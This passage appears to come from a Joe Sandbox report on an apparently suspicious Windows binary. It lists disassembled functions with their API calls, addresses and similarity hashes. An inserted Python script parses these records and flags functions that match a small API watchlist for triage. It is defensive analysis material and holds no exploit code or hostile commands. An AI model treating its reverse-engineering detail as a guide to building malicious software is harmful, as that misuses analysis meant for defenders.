                                          • Opcode Fuzzy Hash: c1e0075132796b7b62d1594597beceb35ed3730008d737b31ed8f1b40e8913f8
                                          • Instruction Fuzzy Hash: F53137306451459FEB22CF19DC84FA537E0FBAAB14F1551AAFA10AB2B1CB71E841EB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA7769
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA778F
                                          • SysAllocString.OLEAUT32 ref: 00EA7792
                                          • SysAllocString.OLEAUT32 ref: 00EA77B0
                                          • SysFreeString.OLEAUT32(?), ref: 00EA77B9
                                          • StringFromGUID2.OLE32 ref: 00EA77DE
                                          • SysAllocString.OLEAUT32 ref: 00EA77EC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 482f9c2d9fd6a5e6815b22aa6479ffa8316d7707fc7b44b647ee5d215d666832
                                          • Instruction ID: 5381c3f32a7bfa77aa367c67d9c6589896e3728b2c8d3e7874a64ec91569e37d
                                          • Opcode Fuzzy Hash: 482f9c2d9fd6a5e6815b22aa6479ffa8316d7707fc7b44b647ee5d215d666832
                                          • Instruction Fuzzy Hash: BD21DE3660921AAFDB00DFA8DC88CFB33ECEB0A3A47108026FA54EB150D670EC45C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA7842
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EA7868
                                          • SysAllocString.OLEAUT32 ref: 00EA786B
                                          • SysAllocString.OLEAUT32 ref: 00EA788C
                                          • SysFreeString.OLEAUT32 ref: 00EA7895
                                          • StringFromGUID2.OLE32 ref: 00EA78AF
                                          • SysAllocString.OLEAUT32 ref: 00EA78BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                          • String ID:
                                          • API String ID: 3761583154-0
                                          • Opcode ID: 0fd3b34988382ce6de2d7089f51e45fe29c43ac60ec5126fc5ef90f86f013efa
                                          • Instruction ID: 8dee8932953ff464b1bf56c7147d45b52a0cab070113167c2947fcc016d2c439
                                          • Opcode Fuzzy Hash: 0fd3b34988382ce6de2d7089f51e45fe29c43ac60ec5126fc5ef90f86f013efa
                                          • Instruction Fuzzy Hash: 8721F131608215AFDB14DFA8DC88CAA77ECEF0E3607108125F910EF2A0DA78EC44CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateHandlePipe
                                          • String ID: nul
                                          • API String ID: 1424370930-2873401336
                                          • Opcode ID: 96d951cc77f723bc107fab92b26bf372136fa59dcf3d58d31a082d27d7671191
                                          • Instruction ID: 1f4911eb983a6fd0b481e5ae044077419c55709775b4006c441bf68bfe2921e0
                                          • Opcode Fuzzy Hash: 96d951cc77f723bc107fab92b26bf372136fa59dcf3d58d31a082d27d7671191
                                          • Instruction Fuzzy Hash: 24215CB5501306AFDB309F69DC44ADB77E4AF44768F204A19E9A1F62E0D770A944CF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%
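The blocks in this section are the Joe Sandbox IDA plugin's per-function records: direct API calls with their call-site addresses, calls inlined from subcalls, and the Similarity fields (API ID, String ID, Opcode ID, fuzzy hashes). When triaging a long report it helps to pull these into structured data rather than read them by eye. The Python below is an added example, not part of the report and not Joe Sandbox code: it parses such records, decodes the SendMessageW message numbers that occur in this section (BM_GETCHECK, PBM_SETRANGE and so on, from the Win32 headers), and flags records that cover an analyst-chosen watchlist. The sample text is excerpted from records on this page and trimmed; the watchlist, and the reading of the API ID as a bag of camel-case fragments of the APIs a function uses, are assumptions made for the example.

```python
"""Parse Joe Sandbox IDA-plugin function records ('APIs' / 'Similarity' blocks) for triage."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three records excerpted from the report above and trimmed.
SAMPLE = """\
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED2E1C
• GetWindowLongW.USER32(00000000,000000F0), ref: 00ED2E4F
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00ED2EE0
• SetWindowLongW.USER32 ref: 00ED2F0B
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• Opcode ID: c1e0075132796b7b62d1594597beceb35ed3730008d737b31ed8f1b40e8913f8
APIs
Strings
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• Opcode ID: 96d951cc77f723bc107fab92b26bf372136fa59dcf3d58d31a082d27d7671191
APIs
  • Part of subcall function 00E4600E: CreateWindowExW.USER32 ref: 00E4604C
  • Part of subcall function 00E4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00ED4112
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00ED4139
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• Opcode ID: a5bd4d371bd1cf06cb0e63985d166ef12192f33427c05433a47883f97ac5021f
"""
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?:•\s*)?([^:]+?):\s*(.*)$")   # '• Key: value' metadata lines
# uMsg values that appear in this section, decoded from the Win32 headers.
WINDOW_MESSAGES = {0x30: "WM_SETFONT", 0xF0: "BM_GETCHECK", 0xF1: "BM_SETCHECK",
                   0x401: "PBM_SETRANGE", 0x402: "PBM_SETPOS", 0x404: "PBM_SETSTEP",
                   0x409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR"}
# Assumption: an analyst-chosen watchlist; the report itself defines none.
WATCHLIST = {"CreatePipe", "TerminateThread", "SHFileOperationW", "MoveFileW"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple                        # raw hex / '?' tokens as the plugin printed them
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # callee address for 'Part of subcall function' lines

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # 'Key: value' lines, e.g. 'Opcode ID'

def parse_records(text: str) -> List[FunctionRecord]:
    """Start a record at every 'APIs' header; classify later lines as API call or metadata."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is not None and line:
            m = API_RE.match(line)
            if m:
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                sub = int(m["sub"], 16) if m["sub"] else None
                cur.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
            elif KV_RE.match(line):
                key, value = KV_RE.match(line).groups()
                cur.fields[key.strip()] = value.strip()
    return records

def decode_message(call: ApiCall) -> Optional[str]:
    """Symbolic name for the uMsg argument of a SendMessageW call, if it is in the table."""
    if call.name != "SendMessageW" or len(call.args) < 2:
        return None
    try:
        return WINDOW_MESSAGES.get(int(call.args[1], 16))
    except ValueError:                 # the plugin prints '?' for values it could not recover
        return None

def camel_tokens(name: str) -> set:
    return set(re.findall(r"[A-Z][a-z]+", name))

def triage(records, watchlist=WATCHLIST):
    """Assumption: 'API ID' reads as a bag of camel-case fragments of the APIs a function uses,
    so a watchlisted name matches when all its fragments occur there or in the listed calls.
    Returns (Opcode ID prefix, matched names, String ID) for each hit."""
    hits = []
    for r in records:
        bag = camel_tokens(r.fields.get("API ID", ""))
        for c in r.calls:
            bag |= camel_tokens(c.name)
        matched = sorted(w for w in watchlist if camel_tokens(w) and camel_tokens(w) <= bag)
        if matched:
            hits.append((r.fields.get("Opcode ID", "")[:12], matched, r.fields.get("String ID", "")))
    return hits
```

Paste the whole section into `SAMPLE` (or read it from a file) and `parse_records` yields one `FunctionRecord` per "APIs" header. Records with no direct calls, like the CreatePipe one with the `nul` string, carry nothing but the API ID token string, which is the only reason `triage` falls back on the fragment-bag heuristic; a hit there is a lead to confirm in the disassembly at the listed addresses, not a verdict.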

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateHandlePipe
                                          • String ID: nul
                                          • API String ID: 1424370930-2873401336
                                          • Opcode ID: 34177229644d88f0d70f42d21cdbedfa568b42b61661ab9fa3876513ad2e1e94
                                          • Instruction ID: a39fd1d75259ba30cd029af6fe82df90c8fd69112c3ef0c30b0f284ffb6163f3
                                          • Opcode Fuzzy Hash: 34177229644d88f0d70f42d21cdbedfa568b42b61661ab9fa3876513ad2e1e94
                                          • Instruction Fuzzy Hash: B2217F755003069FDB209F699C04ADB77E4BF95764F201B19E9A1F72E4D770A860CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E4600E: CreateWindowExW.USER32 ref: 00E4604C
                                            • Part of subcall function 00E4600E: GetStockObject.GDI32 ref: 00E46060
                                            • Part of subcall function 00E4600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4606A
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00ED4112
                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00ED411F
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00ED412A
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00ED4139
                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00ED4145
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$CreateObjectStockWindow
                                          • String ID: Msctls_Progress32
                                          • API String ID: 1025951953-3636473452
                                          • Opcode ID: a5bd4d371bd1cf06cb0e63985d166ef12192f33427c05433a47883f97ac5021f
                                          • Instruction ID: 2a944d1e6c4f87751a5925e6be0c4e2622ce37e05e1d9d857edb217d5ed187cf
                                          • Opcode Fuzzy Hash: a5bd4d371bd1cf06cb0e63985d166ef12192f33427c05433a47883f97ac5021f
                                          • Instruction Fuzzy Hash: F31193B2150219BFEF119E64CC85EE77FADEF18798F015111B718A2190C672DC21DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                          • Instruction ID: 011f3f40f8d44a1f048a904bc20134d84f79604b1242c55b2019989e3726f615
                                          • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                          • Instruction Fuzzy Hash: B7115E71544B04AAD625FFB4CC47FCBBBECAF80700F44982AF39DB6092DA65B5458760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InterlockedExchange.KERNEL32(0110A3F0,0110A3F0), ref: 00EB097B
                                          • EnterCriticalSection.KERNEL32(0110A3D0,00000000), ref: 00EB098D
                                          • TerminateThread.KERNEL32 ref: 00EB099B
                                          • WaitForSingleObject.KERNEL32 ref: 00EB09A9
                                          • CloseHandle.KERNEL32(00000000), ref: 00EB09B8
                                          • InterlockedExchange.KERNEL32(0110A3F0,000001F6), ref: 00EB09C8
                                          • LeaveCriticalSection.KERNEL32(0110A3D0), ref: 00EB09CF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 9218f37f30d8eb2c7ef6a692d95781085852642f6b3f28d6afffd525848183be
                                          • Instruction ID: 44d6566f0f21e971f22311cdcd547c165a7fb50712dd13f3a6515fb0fca00771
                                          • Opcode Fuzzy Hash: 9218f37f30d8eb2c7ef6a692d95781085852642f6b3f28d6afffd525848183be
                                          • Instruction Fuzzy Hash: FEF01D31483913AFD7515B95EE88BD67B35FF41742F502116F101B08B1C774A469CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __allrem.LIBCMT ref: 00E700BA
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E700D6
                                          • __allrem.LIBCMT ref: 00E700ED
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E7010B
                                          • __allrem.LIBCMT ref: 00E70122
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E70140
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                          • Instruction ID: f17930a8099cba36ff5f834a769c489e17097516d9d3bf99dea1af598bdd60a9
                                          • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                          • Instruction Fuzzy Hash: 8A812871B00706DBE724AF68DC41B6B73E9AF41368F24A53EF559F6281E7B0D9008B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCopy$AllocInitString
                                          • String ID:
                                          • API String ID: 3859894641-0
                                          • Opcode ID: 62059b90202953d415ed9a807059ea7066202e0ccbcaa05ebc5c4b30746c2d52
                                          • Instruction ID: 450ec3434c5eb298e56546a3b199cca0c54bc77d5d0353a92994bf83758c2b8b
                                          • Opcode Fuzzy Hash: 62059b90202953d415ed9a807059ea7066202e0ccbcaa05ebc5c4b30746c2d52
                                          • Instruction Fuzzy Hash: EA51B531600310BACF24ABA5D895B69B3E9EF85324B24A467E905FF296DB70CC40C796
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E47620: _wcslen.LIBCMT ref: 00E47625
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00EB94E5
                                          • _wcslen.LIBCMT ref: 00EB9506
                                          • _wcslen.LIBCMT ref: 00EB952D
                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00EB9585
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$FileName$OpenSave
                                          • String ID: X
                                          • API String ID: 83654149-3081909835
                                          • Opcode ID: 869b365df4d7cd3e1118c33bf822e541b25c78226f19c2b3a344237b6dc84e8a
                                          • Instruction ID: a8b149f197423e1622a18e378fd52fbbdf8282cc479f183d2801d30be547167d
                                          • Opcode Fuzzy Hash: 869b365df4d7cd3e1118c33bf822e541b25c78226f19c2b3a344237b6dc84e8a
                                          • Instruction Fuzzy Hash: 12E1B0319083008FD724DF24D881AABB7E5FF85314F14996DF999AB2A2DB31DD05CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • BeginPaint.USER32(?,?), ref: 00E59241
                                          • GetWindowRect.USER32(?,?), ref: 00E592A5
                                          • ScreenToClient.USER32(?,?), ref: 00E592C2
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E592D3
                                          • EndPaint.USER32(?,?), ref: 00E59321
                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E971EA
                                            • Part of subcall function 00E59339: BeginPath.GDI32 ref: 00E59357
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                          • String ID:
                                          • API String ID: 3050599898-0
                                          • Opcode ID: 1d4294e9c280fa81eab6007ceb2fee3f67e1a92403cadfb7d4d0faf6bb3427b0
                                          • Instruction ID: 363ff46f6508d0a2aa9bcec269e5d88ed3cf95727aefe36ff468b5f91a2d2ae4
                                          • Opcode Fuzzy Hash: 1d4294e9c280fa81eab6007ceb2fee3f67e1a92403cadfb7d4d0faf6bb3427b0
                                          • Instruction Fuzzy Hash: B741AD30105201EFDB10DF25DC84FEA7BF8FB55765F140629FAA4A72A2C7309849EB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EB080C
                                          • ReadFile.KERNEL32 ref: 00EB0847
                                          • EnterCriticalSection.KERNEL32(?), ref: 00EB0863
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00EB08DC
                                          • ReadFile.KERNEL32 ref: 00EB08F3
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EB0921
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3368777196-0
                                          • Opcode ID: 2fcd348d3b130377eb0eab84478df72b4123e8e1f86c5b06a84195fb938df8a4
                                          • Instruction ID: 919511a540d3421a9d999c9b1631059f5ae623144fd60fbbfea01912a914a7d7
                                          • Opcode Fuzzy Hash: 2fcd348d3b130377eb0eab84478df72b4123e8e1f86c5b06a84195fb938df8a4
                                          • Instruction Fuzzy Hash: 35417A71900206EFDF14AF54DC85AAB77B8FF44310F1440A9ED04AA2A7DB30EE65DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00ED824C
                                          • EnableWindow.USER32(00000000,00000000), ref: 00ED8272
                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00ED82D1
                                          • ShowWindow.USER32(00000000,00000004), ref: 00ED82E5
                                          • EnableWindow.USER32(00000000,00000001), ref: 00ED830B
                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00ED832F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: 5af9e2be6c5f94a45134bcf6d52339766a769359a7f7043a88eb9d773b467daf
                                          • Instruction ID: a6b0b1a890bb936de5b01c693d9173578348a4f21f391a5632a78022a34eab7e
                                          • Opcode Fuzzy Hash: 5af9e2be6c5f94a45134bcf6d52339766a769359a7f7043a88eb9d773b467daf
                                          • Instruction Fuzzy Hash: 1D41C634601644EFDB11CF25DE95BE47BF0FB06718F19626AE6586B3B2CB319846CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00EA4C95
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EA4CB2
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EA4CEA
                                          • _wcslen.LIBCMT ref: 00EA4D08
                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00EA4D10
                                          • _wcsstr.LIBVCRUNTIME ref: 00EA4D1A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
